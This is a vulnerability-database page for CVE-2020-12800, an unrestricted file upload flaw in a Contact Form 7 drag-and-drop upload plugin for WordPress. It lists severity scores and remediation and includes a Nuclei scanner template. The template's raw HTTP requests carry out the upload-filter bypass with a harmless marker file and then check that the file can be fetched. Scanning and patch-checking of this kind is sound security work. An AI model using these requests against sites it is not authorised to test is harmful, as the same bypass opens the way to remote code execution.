Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-12800
HistoryAug 23, 2021 - 11:27 p.m.

WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution

2021-08-2323:27:51
ProjectDiscovery
github.com
7
wordpress
wp-plugin
fileupload
rce
packetstorm
intrusive
codedropz

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.975

Percentile

100.0%

WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
id: CVE-2020-12800

info:
  name: WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    WordPress Contact Form 7 before 1.3.3.3 allows unrestricted file upload and remote code execution by setting supported_type to php% and uploading a .php% file.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update the Contact Form 7 plugin to version 1.3.3.3 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12800
    - https://github.com/amartinsec/CVE-2020-12800
    - https://packetstormsecurity.com/files/157951/WordPress-Drag-And-Drop-Multi-File-Uploader-Remote-Code-Execution.html
    - https://wordpress.org/plugins/drag-and-drop-multiple-file-upload-contact-form-7/#developers
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12800
    cwe-id: CWE-434
    epss-score: 0.97465
    epss-percentile: 0.99957
    cpe: cpe:2.3:a:codedropz:drag_and_drop_multiple_file_upload_-_contact_form_7:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: codedropz
    product: drag_and_drop_multiple_file_upload_-_contact_form_7
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,fileupload,wp,rce,packetstorm,intrusive,codedropz

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601
        X-Requested-With: XMLHttpRequest

        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="supported_type"

        txt%
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="size_limit"

        5242880
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="action"

        dnd_codedropz_upload
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="type"

        click
        -----------------------------350278735926454076983690555601
        Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%"
        Content-Type: application/x-httpd-php

        CVE-2020-12800-{{randstr}}
        -----------------------------350278735926454076983690555601--
      - |
        GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2020-12800-{{randstr}}"

      - type: status
        status:
          - 200
# digest: 490a00463044022014f2c6293b5487344a5211f24394c32eaa0ba6ccb85df0f909313b3a02f980f602202a0cd67991ee177b7b5e7d576271960799fe9c738787a0cd09fb2d5f79319ca0:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.975

Percentile

100.0%